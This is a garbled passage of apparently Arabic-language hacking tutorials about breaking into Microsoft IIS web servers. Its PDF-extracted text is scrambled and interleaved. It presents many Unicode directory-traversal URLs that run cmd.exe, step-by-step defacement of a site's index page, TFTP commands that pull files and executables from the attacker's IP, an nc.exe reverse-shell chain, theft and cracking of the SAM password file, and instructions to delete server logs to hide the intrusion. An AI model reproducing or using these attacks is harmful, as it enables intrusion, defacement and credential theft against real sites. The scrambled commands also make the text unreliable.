exe?/c+dir+c vti_bin/.%%35%63..%25%35%63.%255c._/ %25%35%63.%255c..%255c.exe?/c+dir+c/ 131 .%255c./ \:%255cwinnt/system32/cmd.%255c.../ \:%252fwinnt/system32/cmd.%255cwinnt/system32/cmd......./ %25%35%63../ \:%255cwinnt/system32/cmd../ %25%35%63.....%252f.%255c.exe?/c+dir+c/ \:scripts/...%%35%63..exe?/c+dir+c samples/..%25%35%63.exe?/c+dir \:+c \:Rpc/.exe?/c+dir+c vti_bin/.%C0%AF.exe?/c+dir+c/ Rpc/..exe?/c+dir \:+c vti_bin/./ \:%C1%1Cwinnt/system32/cmd.exe?/c+dir+c/ \:scripts/...%255c.%255c.%255c.%c1%9c.%255c.%%35c.%%35%63...%c1%8s.%255cwinnt/system32/cmd..%255c....%255c.exe?/c+dir+c Rpc/....exe?/c+dir+c scripts/.exe?/c+dir+c PBServer/.%%35%63.%255c..%%35c.exe?/c+dir+c/ \:PBServer/...exe?/c+dir+c \:scripts/...._/ \:%255cwinnt/system32/cmd./ \:%255cwinnt/system32/cmd.%c0%af.exe?/c+dir+c/ \:scripts/.%_/ \:%35%63.vti_bin/...exe?/c+dir+c/ \:Rpc/..%C1%9C.%25%35%63.exe?/c+dir+c/ \:scripts/..%%35c./wi \:nnt/system32/cmd.%%35cwinnt/system32/cmd.....%c1%1c./winnt/system32/cmd./winnt/system32/cmd.%%35%63.....%%35%63./winnt/system32/cmd../winnt/system32/cmd.%252f..%25%35%63...%C0%AF.%C1%1C.%25%35%63.exe?/c+dir+c cgi-bin/....%%35c....exe?/c+dir+c iisadmpwd/.%/ \:%35%63winnt/system32/cmd./winnt/system32/cmd.%255c.%25%35%63..../winnt/system32/cmd....%255cwinnt/system32/cmd..%255c._/ %25%35%63.exe?/c+dir+c/ \:scripts/...%255c.exe?/c+dir+c scripts/....%255c..%25%35%63.%25%35%63.exe?/c+dir+c adsamples/.%%35%63.%C1%1C...%%35c...%%35c..%252fwinnt/system32/cmd./winnt/system32/cmd./winnt/system32/cmd...exe?/c+dir+c vti_cnf/..%c0%9v..%25%35%63.%255c..%252f.%252f.%25%35%63....%252f....%C1%9C.%255c.exe?/c+dir+c/ \:scripts/.%252f.%25%35%63winnt/system32/cmd.%252f..exe?/c+dir+c \:PBServer/..exe?/c+dir+c/ PBServer/..%%35c.%%35c..%255c..../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/.%c0%qf.%255c..%255c.%252f../ \:%C1%9Cwinnt/system32/cmd./ \:%C0%AFwinnt/system32/cmd.%255c...%_/ \:%35c._/ \:%255c.%25%35%63winnt/system32/cmd.%/ \:%35%63winnt/system32/cmd./wi \:nnt/system32/cmd.%C0%AF.%255c..%C1%1C.exe?/c+dir+c scripts/..%%35%63.%255c.%255c..%255c.%%35cwinnt/system32/cmd...%C1%9C.......exe?/c+dir+c vti_bin/...%255c.%255c..

.%c0%af./ \:%c0%af.exe?/c+dir+c/ \:scripts/../......%c0%af./winnt/system32/cmd...%c0%af..%c0%af.exe?/c+dir+c iisadmpwd/.%c0%af./winnt/system32/cmd..%c1%pc........%c0%af........]/ \:%c0%af../.._/ \:%c0%af./winnt/system32/cmd..%c0%9v..exe?/c+dir+c/ \:scripts/.%c0%af..../winnt/system32/cmd....../winnt/system32/cmd../ \:%c0%af..exe?/c+dir+c vti_bin/./winnt/system32/cmd..%c0%af./winnt/system32/cmd.exe?/c+dir+c adsamples/.../winnt/system32/cmd..%c0%af.%c0%af..%c0%af.%e0%80%af..%c0%af.%c0%af.\%e0\%80\%af.exe?/c+dir+c/ msadc/./ \:%c0%af./winnt/system32/cmd.exe?/c+dir+c \:scripts/.%c0%af....%f8%80%80%80%af.exe?/c+dir+E E:\ ‫لقرائه ما بداخل هارديسك‬ 132 .exe?/c+dir+c ‫ من الموقع‬TFTPD ‫( بأمكانك الحصول على برنامج‬2 /http://iisbughelp.%c0%af...%c0%af./winnt/system32/cmd./winnt/system32/cmd..exe?/c+dir+c/ \:scripts/.exe?/c+dir+c vti_cnf/../winnt/system32/cmd..%c1%8s..]/ \:%c0%af.%c0%af./winnt/system32/cmd../ \:%c0%af./winnt/system32/cmd...com ‫( معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع النتقال عبر الهارديسكات وعبر الملفات‬3 ( ‫)تعمل عبر المتصفح‬ scripts]/../.../winnt/system32/cmd./winnt/system32/cmd..exe?/c+dir+c samples/./winnt/system32/cmd...%c0%qf._/ \:%c0%af./winnt/system32/cmd././winnt/system32/cmd./winnt/system32/cmd....exe?/c+dir+c/ \:scripts/.%c0%af.%c1%9c.%fc%80%80%80%80%af.%c0%af..exe?/c+dir+c/ \:scripts/..exe\?/c+dir+c cgi-bin/.%c1%af.%c0%af..exe?/c+dir+D D:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/./winnt/system32/cmd.%c0%af.]/ \:%c0%af./....%c0%af.%c0%af.%c0%af.4t..%c0%af.exe?/c+dir+c/ \:scripts/../.%c1%pc.exe?/c+dir+c/ \:scripts/.exe?/c+dir+c/ \:scripts/../...%c0%af.exe?/c+dir+c vti_bin/./winnt/system32/cmd./winnt/system32/cmd.\:scripts/...../ \:%c0%af.%c1%1c./..%c1%9c./winnt/system32/cmd.../.%f0%80%80%af.%c0%af.exe?/c+dir+C C:\ ‫لقرائه ما بداخل هارديسك‬ scripts]/../winnt/system32/cmd.exe?/c+dir+c/ \:scripts.%c0%af./././._/ \:%c0%af.%c0%af..\%e0\%80\%af...exe?/c+dir+c/ msadc/...%c0%af....../winnt/system32/cmd.\/ \:%e0\%80\%af.exe?/c+dir+c/ \:scripts/...exe?/c+dir+c/ \:scripts/.%c0%af.%c0%af.%c0%af.%c0%af..exe?/c+dir+c/ \:scripts/.%c0%af...

%c0%af......htm‬‬ ‫‪index.%c0%af.././winnt/system32/cmd.asp‬‬ ‫لنفرض الن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا ‪ wwwroot‬هي ‪ index..%c0%af././winnt/system32/cmd.asp‬‬ ‫‪default..htm‬الى اي اسم اخر يخطر ببالك وليكن ‪ss...htm‬‬ ‫‪default.‫نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب )) اغلب‬ ‫ثغرات اليونيكود تنطلق من هذه المجلدات ((‬ ‫‪(1‬مثال المجلد ‪msadc‬‬ ‫‪msadc/./‬‬ ‫‪\:%c0%af.%c0%af._/‬‬ ‫‪\:%c0%af.%c0%af./winnt/system32/cmd.asp‬‬ ‫‪main../‬‬ ‫‪%c0%af../winnt/system32/cmd....%c0%af.htm‬‬ ‫‪main./..exe?/c+dir+C‬‬ ‫في سيرفرات ‪ IIS‬عند تركيبها )) بشكل عادي (( يكون المجلد الرئيسي للويب تحت اسم معين وهو ‪:‬‬ ‫‪C:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪D:\Inetpub\wwwroot‬‬ ‫او في المجلد‬ ‫‪E:\Inetpub\wwwroot‬‬ ‫في العاده يكون في الهارديسك ‪ C‬ولذلك سأكمل شرحي على انه هناك‬ ‫ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر‬ ‫فلو وجدنا ثغرة يونيكود ما ولتكن‬ ‫‪msadc/..exe?/c+dir+c‬‬ ‫وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا ‪:‬‬ ‫‪msadc/..exe?/c+dir+C‬‬ ‫‪ (2‬مثال المجلد _‪vti_bin‬‬ ‫‪vti_bin/./.htm‬‬ ‫طبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله ‪ c+dir‬الى الداله ‪c+ren‬‬ ‫)) عليك ان تعرف ان الوامر التي سوتضع هي نفس الوامر الموجوده في ‪ Dos‬وفي ‪Command‬‬ ‫‪ Prompt‬فعليك ان تكون عارفا بما هو المر المراد استخدامه‬ ‫المهم ستكتب الثغره هكذا ‪:‬‬ ‫‪133‬‬ ./././.exe?/c+dir+C:\Inetpub\wwwroot‬‬ ‫اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ) ستجدها في مجلدات بداخل مجلد الـ‬ ‫‪ ( wwwroot‬اما لو كان السيرفر عباره‬ ‫عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ ‪ wwwroot‬نفسه‬ ‫في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه‬ ‫الولى تحمل اسم ‪index..%c0%af.htm‬فكيف‬ ‫سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية‬ ‫الختراق هذه‬ ‫سنقوم اول بتغيير اسم الملف من ‪ index...%c0%af.htm‬‬ ‫هناك عدة تسميات وأختصارات لها وهذه بعضها )) معظمها ((‬ ‫‪index./‬‬ ‫‪\:%c0%af./....

.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.exe?/c+ren+C:\Inetpub\wwwroot\index./winnt/system32/cmd.%c0%af.htm+C:\Inetpub\wwwroot\index.exe+‬‬‫‪i"+XXX..XXX./‬‬ ‫"‪%c1%9c.htm‬‬ ‫‪C:\inetpub\wwwroot\index.htm‬‬ ‫ياللروعه لقد تجاوزنا العقبه بالفعل ‪(:‬‬ ‫الن قم بتشغيل سيرفر الـ ‪ TFTP‬وقم بتجهيز ملف الـ ‪index.XXX.htm‬الى ‪ss.XXX get index./winnt/system32/cmd.‫‪msadc/.exe?/c+tftp..XXX‬تعني اي بي السيرفر المراد سحب الملف منه ((‬ ‫في توليفة هذا المر يقوم الكلينت بطلب الملف المسمى ‪ index...htm‬؟؟‬ ‫هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر التصال بمنفذ ‪ TFTP‬الذي ستكون فيه انت في وضع‬ ‫السيرفر والموقع الذي امامك‬ ‫في وضع الكلينت‬ ‫كيف سيتم هذا ؟‬ ‫اول قم بتركيب نظام سيرفر ‪ TFTP‬على جهازك ) البرنامج المذكور في اول الموضوع من افضل البرامج‬ ‫وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي (‬ ‫الن ضع السيرفر الرئيسي في \‪ C:‬لديك‬ ‫قم بتصميم صفحة خفيفه وسريعه وسمها ‪ index..%c1%9c./.exe -i XXX..XXX.htm‬‬ ‫وقم بالتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو ‪:‬‬ ‫‪msadc/.htm‬‬ ‫وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختراق )) تقريبا ‪(( (:‬‬ ‫ملحوظه ‪ :‬يمكنك ان تقوم بتحميل ملفات ‪ EXE‬ايضا وتشغيلها على السيرفر بنفس السلوب وهذا مثال ‪:‬‬ ‫‪134‬‬ .XXX.%c1%9c.ht‬‬ ‫‪m+ss.htm‬‬ ‫ارأيتم كم هو سهل ‪ (:‬؟‬ ‫‪A‬يبدو انك ايها المخترق لم تكتفي باغلق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر‬ ‫وليكن الموضوع هو‬ ‫‪!!!Hacked‬‬ ‫فكيف سنرسلها في صفحة ‪ index./‬‬ ‫‪%c0%af.XXX.XXX....XXX.htm‬‬ ‫)) ‪ XXX.exe+‬‬‫‪i"+XXX.htm‬‬ ‫وهكذا فقد تم تغيير اسم الصفحة من ‪ index.%c0%af.XXX../.XXX+GET+index.htm‬ليضعه في جهازه في المجلد‬ ‫‪wwwroot‬‬ ‫ولكن ل تنسى فشكل توليفة الوامر يختلف من الوضع العادي عن وضع اليونيكود‬ ‫فما هو الحل ؟‬ ‫الحل هو ان تحول توليفة المر الى يونيكود لتضعه في الثغره التي لديك‬ ‫بعد تحويل المر الى يونيكود سيصبح شكله كالتالي ‪:‬‬ ‫"‪tftp././..htm‬وضعها في \‪C:‬‬ ‫الن نريد ان نرسل للسيرفر الملف الجديد من \‪ C:‬لدينا الى ملف‬ ‫‪C:\inetpub\wwwroot‬‬ ‫ل ليس المر صعبا ففي نظم ميكروسوفت يوجد امر )) هو بالصح برنامجا منفصل (( يحمل اسم ‪TFTP‬‬ ‫وهو عباره عن كلينت بسيط يستخدم‬ ‫بروتوكول ‪ TFTP‬وهو بروتوكول بسيط جدا جدا )) يسميه البعض البروتوكول التافه (( يقوم بسحب او‬ ‫ارسال الملفات من والى الجهاز‬ ‫نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟‬ ‫طبعا لو كنا في غير اليونيكود لكتبنا توليفة المر التالي ‪:‬‬ ‫‪tftp.

./..XXX./hunter.%c1%9c..%c0%af.exe/‬‬ ‫او عن طريق هذا المر‬ ‫‪msadc/.%c0%af.....log‬‬ ‫وسيكون ذلك عن طريق هذا المر ‪:‬‬ ‫‪msadc/./...%c0%af.exe?/c+tftp./..XXX.%c1%9c././winnt/system32/cmd..%c1%9c...log/s‬‬ ‫هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات‬ ‫المتداد ‪tmp‬‬ ‫وهذا امر مسحها عبر اليونيكود ‪:‬‬ ‫‪msadc/./winnt/system32/cmd.exe+C:\hunter.%c1%9c./‬‬ ‫‪%c0%af./../.XXX+GET+hunter.‫لنفرض اننا نريد تحميل ملف ‪ EXE‬على السيرفر وسميناه ‪ hunter././‬‬ ‫‪%c0%af../‬‬ ‫‪%c1%9c../.exe?/c+hunter.%c1%9c./.././winnt/system32/cmd..exe+‬‬‫‪i"+XXX..‬‬ ‫انتهى‪،،،‬‬ ‫‪135‬‬ ..tmp/s‬‬ ‫ايضا ملحوظه مهمه وهي ان ل تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او‬ ‫ايميلتهم الحقيقيه قم بمسح اي شيء يدل عليك‬ ‫او على عملية الختراق )) حاول ان تصل الى هذا المستوى ((‬ ‫هناك عدد من الشياء والفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف ‪ bat‬حتى تتمكن من‬ ‫وضع مشكله كبيره في السيرفر لكي ل يعمل‬ ‫او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج‬ ‫التحكم عن بعد و اخفائها بشكل جيد‬ ‫في المجلدات ذات الملفات الكثير )) مثل ‪ (( system32‬والكثير الكثير‬ ‫______________________________________________________________‬ ‫__________________‬ ‫ملحوظات ‪ :‬لن تعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن‬ ‫طريق مسح ملف ‪ tftp‬من سيرفراتهم‬ ‫)) الملف المسؤول عن ذلك موجود في المجلد ‪ (( system32‬وبعض السيرفرات قامت بعملية الترقيع‬ ‫)) اصدرت ميكروسوفت ترقيعا لهذه الثغره ((‬ ‫وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه‬ ‫العمليات‬ ‫واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم ‪ IIS‬ال وهو ‪ Secure IIS‬من شركة ‪Eeye‬‬ ‫والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع )) قبل حوالي اربعة اشهر (( كان ما يقارب ‪%90‬‬ ‫من السيرفرات التي فيها نظام ‪IIS‬‬ ‫تحوي هذه الثغره وبدون ترقيع )) لعدم وجوده وقتها (( او لهمال المدير‪.%c1%9c.exe‬ونريد تشغيله فكيف لنا ذلك ؟‬ ‫سنتبع التي ‪:‬‬ ‫نقوم بتحميل الملف على السيرفر كما قمنا بتحميل ‪ index./winnt/system32/cmd.exe?/c+del+C:\*.....htm‬ونضعه في \‪ C:‬للسيرفر عبر هذه التوليفه‬ ‫‪:‬‬ ‫‪msadc/.exe?/c+del+C:\*..exe‬‬ ‫بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا المر‬ ‫‪msadc/.exe‬‬ ‫الن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج ‪*.../‬‬ ‫"‪%c1%9c...%c1%9c..%c0%af.

:‬‬ ‫‪--------‬‬‫معظم الطرق الموجودة هنا تعمل على سيرفرات ‪ IIS4.‬لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع‬ ‫توضيح كيفية عملها ‪.‬‬ ‫‪------------‬‬‫المتطلبات ‪.:‬‬ ‫‪--------‬‬‫يعلم الجميع مدى انتشار سيرفرات ‪ IIS‬حيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت ‪.0‬و ‪ IIS5.net/rfp‬‬ ‫‪ -2‬اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله من الموقع ‪:‬‬ ‫‪( /http://www.‫" الدليل الكامل لختراق سيرفر ‪" IIS‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫>ةةةةةة‪< DEMON :‬‬ ‫‪--------‬‬‫مقدمة ‪..wiretrip.com‬‬ ‫‪ -3‬ويب سيرفر )اي نوع( اباتشي او ‪.... IIS‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪#########################‬‬ ‫‪###########‬‬ ‫‪# Game Starts !#‬‬ ‫‪###########‬‬ ‫‪---------------‬‬‫‪136‬‬ .:‬‬ ‫‪------------‬‬‫‪ CGI-Scanner -1‬جيد ‪ .‬‬ ‫‪--------‬‬‫ملحظة ‪.‬أنا افضل ‪) Whisker‬يمكنك تنزيله من هذا الموقع ‪:‬‬ ‫‪( www.0‬وجميعها تعتمد على البورت ‪)) 80‬يعني‬ ‫من خلل المتصفح(( ‪.activestate.‬‬ ‫ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات ‪ .

com‬وستجد امامك ‪eGG SheLL‬‬ ‫ملحظة ‪ :‬تعمل هذه الثغرة على سيرفرات ‪ IIS4..‬على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة‬ ‫ام ل ‪.‬‬ ‫قم اول بالتصال بالنظام الهدف ‪ c:\>nc -nw -w 2 http://www..com‬‬ ‫‪Please type the NT commandline you want to run (cmd /c assumed):\n‬‬ ‫‪cmd /c‬‬ ‫إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر ‪echo hacked by me hehe > :‬‬ ‫‪C:\inetpub\wwwroot\index.‬‬ ‫بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع ‪www.exe http://www. /http://www.exe&&del ftptmp&& attrib -r%‬‬ ‫‪nc. Administrator‬‬ ‫‪-------------------------------------‬‬‫‪-: Codebrws.hehe.exe‬وضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتشي ‪ (Htdocs‬وفي ‪IIS‬‬ ‫الدليل ‪..exe‬‬ ‫‪c:\>iishack. Administrator‬‬ ‫بامكانك انزال ‪ NC.‬سيتم تشغيل وامرك بصفتك مستخدم‬ ‫‪ SYSTEM‬اي بصلحيات مدير النظام ‪ .asp‬‬ ‫‪-------------------------------------‬‬‫الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي مع ‪ IIS‬ولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظام‬ ‫‪137‬‬ ...‬‬ ‫قم بنسخ اداة ‪ nc..0‬فقط ))اذا لم يتم تركيب الرقعه(( ‪.‬‬ ‫‪do you want me to explain what to do next..wiretrip.exe‬‬ ‫‪---------------‬‬‫اكتشف خبراء المن في شركة ‪ eEye‬ثغرة امنية تسمح لك بتحميل نسخه ذكية من ‪ nc.pl ..htm‬‬ ‫وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل ‪ Hacker's Swiss knife Army‬اقصد‬ ‫‪ Nc..exe‬بواسطة هذا المر ‪:‬‬ ‫‪systemroot%&&tftp -i YourIP GET nc.pl -h host.target.com/ 80 your_IP/ncx.: IIS Hack. 80‬‬ ‫وهذا سيعطيك سطر اوامر ‪ cmde.exe&&nc. hey common you must be‬‬ ‫‪kidding‬‬ ‫‪..technotronic.‬‬ ‫‪----------------‬‬‫‪-: MDAC = RDS‬‬ ‫‪----------------‬‬‫اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان ‪ %40‬من المواقع تعاني منها ‪. wwwroot‬‬ ‫ثم قم بتشغيل ‪: IISHack..exe -l -p 80 -t -e cmd.‬‬ ‫تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي ‪ .net/rfp :‬‬ ‫‪(( mdac.exe‬مع امتيازات ‪.pl )) v‬‬ ‫‪c:\> mdac.dll HTTP :‬‬ ‫فإذا كان الرد ‪ application/x_varg :‬فهذا يعني ان النظام مصاب )) اذا لم يتم ترقيعه (( ‪.‫‪.exe‬وجعلها تنصت‬ ‫على المنفذ ‪.exe‬‬ ‫وبعد اتمام الخطوة السابقة بنجاح ‪:‬‬ ‫‪ /c:\>nc http://www.exe‬من الموقع ‪.com‬‬ ‫ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ‪.msadc2.asp & Showcode.exe‬‬ ‫)) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته جيدا ((‬ ‫بعدها قم بالتصال بالنظام الهدف على المنفذ ‪ 80‬وستجد سطر اوامر مع امتيازات ‪.target.com/ 80 :‬ثم قم بارسال‬ ‫المر ‪GET /msadc/msadcs.exe‬و ‪ IIS Hack..host.

dll & .asp‬‬ ‫‪---------------------‬‬‫‪....hilitetype=full‬‬ ‫مع تغيير الـ ‪ XXXXX/XXXXX/XXXX/XXX.asp::‬‬ ‫‪$DATA‬‬ ‫‪-----------------‬‬‫‪...: webhits.0‬‬ ‫ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((‬ ‫الجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل ‪Global.com/xxxxxxxxx/xxxxxxxx/x. IIS4.. 1998‬وهي مخصصة بالتحديد لسيرفرات ‪ IIS3.com/default.com/msadc/samples.‬‬ ‫‪-------------‬‬‫‪.‬‬ ‫باختصار تسمح لك برؤية السورس كود لي ملف ‪. LC3‬‬ ‫‪-----------------------------------------------‬‬‫]‪-: ASP Alternate Data Streams [::$DATA‬‬ ‫‪-----------------------------------------------‬‬‫هذه الثغرة كانت بدايتها منذ العام ‪ .http://www. Default...victim.0‬والن تعمل على‬ ‫بعض سيرفرات ‪.victim.: ASP dot bug‬‬ ‫‪-----------------‬‬‫ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ‪..victim.htw‬‬ ‫‪iissamples/issamples/oop/qsumrhit.htw‬‬ ‫‪isssamples/exair/search/qsumrhit.htw‬باحد هذه الملحقات ‪ .‬وبالتأكيد سيعمل احدها ‪:‬‬ ‫‪iissamples/issamples/oop/qfullhit..htw‬‬ ‫‪---------------------‬‬‫اول قم بتجربة اللنك على النظام الهدف ‪http://www.‫تفعيله ‪.victim. Expand it & Crack it‬باستخدام الداة المفضلة لدي ‪) LC3.0‬سيتم‬ ‫كسرها في اقل من ‪ 24‬ساعه ( ‪... %90‬‬ ‫اخيرا جرب تنفيذ الثغرة بهذه الطريقة ‪:‬‬ ‫‪www.‬لذا سأكتفي فقط بطريقة الستفادة منها ‪. ASP‬‬ ‫لتنفيذ الثغرة ‪http://www.HiliteType=full :‬‬ ‫سيعرض لك هذا الرابط السورس كود الخاص بالصفحه ‪.‬‬ ‫فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف ‪)) asp..‬‬ ‫باستخدام هذا المر ستحصل على ملف السام )) اذا كان النظام مصابا (( ‪:‬‬ ‫‪_.victim.com/blabla.com/null.htw‬‬ ‫‪-----------‬‬‫عملية شرح كيفية عمل هذه الثغرة معقد قليل ‪ .asa‬‬ ‫يمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر ‪http://www..nt/repair/sam‬‬ ‫بعد الحصول على ملف السام ‪ ..‬‬ ‫‪138‬‬ .htw‬‬ ‫‪isssamples/exair/search/qfullhit.htw‬‬ ‫وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة ‪.‬اعني رؤية‬ ‫المصدر(( ‪.htw :‬‬ ‫فإذا كان الرد بهذه العبارة ‪ format of the QUERY_STRING is invalid :‬فهذا يعني ان النظام‬ ‫الهدف مصاب بنسبة ‪.htw?CiWe.: Null.

htr‬‬ ‫مكان الـ ‪ <=230‬نقوم بوضع ‪ 230‬مسافة بهذا الشكل ‪..asp.: ISM.0‬‬ ‫‪-----------------------------------‬‬‫‪.‬‬ ‫وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما ‪ .‬لذا يجب اعادة‬ ‫تحميل الملف في الذاكرة مره اخرى ‪ .com/global.‬ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف‬ ‫‪ ISM. Space‬‬ ‫يمكن تنفيذ الثغرة بهذا الشكل ‪:‬‬ ‫‪http://www.0‬ولكن ل يمكن تجربتها على السيرفر اكثر من مره ال اذا‬ ‫قام بتسجيل خروج وتسجيل دخول ‪ .‬وسيحصل على معلومات قيمة و هامة أيضا ‪.‫حيث تم اكتشافها في العام ‪.0&5.‬‬ ‫الملف المسؤوول عن هذا الخطأ هو ‪ ISM.<=230)global.asa%20(.csc‬‬ ‫‪-----------‬‬‫تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ ‪ DNS‬الخاص بالموقع بما في ذلك ‪DSN...victim. ASP‬‬ ‫يمكن استخدامها بهذا الشكل ‪:‬‬ ‫‪http://www.com/adsamples/config/site. 1997‬‬ ‫ويتم تنفيذها من المتصفح بهذا الشكل ‪:‬‬ ‫‪ http://www.: site.‬وفي الحقيقة نحن نقوم بطلب ملف‬ ‫اخر ‪..com/global. IIS3. Logout & Login‬‬ ‫‪---------‬‬‫‪-: htr.dll‬حيث يتم تحميله بعدد كبير من الرموز المسافة )‪( 20%‬‬ ‫‪..+‬‬ ‫‪--------‬‬‫هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ‪.asa.‬اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل‬ ‫‪ Rebot‬او ‪.victim..asa+.csc :‬‬ ‫سيقوم المهاجم بانزال الملف المذكور ‪ .‬لحظ النقطة الموجودة في اخر السطر‬ ‫وهي فقط تعمل على سيرفرات ‪..victim.. %20‬‬ ‫هذا الخطأ يعمل على سيرفرات ‪ .dll‬عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫‪139‬‬ ..htr‬‬ ‫‪------------‬‬‫‪.victim. PASS Database‬‬ ‫الثغرة ‪http://www. UID and‬‬ ‫‪.DLL Buffer Truncation‬‬ ‫‪-----------------------------------‬‬‫خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ‪.. IIS 4...com/sample.

....md.%..%5c..‬‬ ‫اعذرونى على غيبتى و انقطاعى عنكم و لكن و ال ظروف رهيبه‬ ‫و الن خلونا نرغى فى شويه كلم فاضى على رأى بروكن‬ ‫كنت اتصفح النترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث‬ ‫عن اليونى كود )طبعا الن معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ‪.‬الخ ( و لكن انا اقوله‬ ‫اصبر لقد ذكرت اليونى كود فى المنتديات ثلث مرات مره عن الصديق بلك هنتر و مره من الخ هكس و‬ ‫مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام الختلف عن المرات‬ ‫السابقه )‪( Trust Me‬‬ ‫و الن دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم‪::‬‬ ‫اول‪:‬‬ ‫====‬ ‫متى وجدت اليونى كود؟‬ ‫‪Found On 15 May 2001 BY NSFOCUS‬‬ ‫السيستيمز التى تتأثر بالثغره هى ‪::‬‬ ‫‪All running IIS 4 / IIS 5 web server‬‬ ‫‪Windows 2k‬‬ ‫‪Windows 2k SP1 + SP2‬‬ ‫ثغره اليونى كود ‪::‬هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلحيه مسموح بها )اى يكون‬ ‫له امتياز ‪( IUSR_machinename account‬‬ ‫و تحدث هذه الثغره اصل نتيجه ان روتين ال ‪ cgi‬الموجود على الويب سرفر نفسه يفك شفره عنوان الموقع‬ ‫مرتين و هذا ما نسميه بال ‪) DeCode‬ل تقلق ستفهم بعد ذلك (‬ ‫تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى‬ ‫و ليكن مثل ‪::‬‬ ‫‪ <=== http://iisserver/scripts/./scripts/‬و هذا الفولدر لديه امتيازات تنفيذيه على السرفر )اى يمكن لليوزر تنفيذ اى امر على الوب‬ ‫سرفر من خلله ( وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال ‪ cgi‬الموجوده على الوب سرفر و‬ ‫‪140‬‬ .‫"دراسة مفصلة وبعمق في الـ ‪"UniCode‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dark Devil :‬‬ ‫السلم عليكم ورحمه ال و بركاته ‪::‬‬ ‫ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو‪..exe?/c+dir+c‬ثغره يونى كود‬ ‫‪ <==== /http://iisserver‬سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه‬ ‫* ‪ .

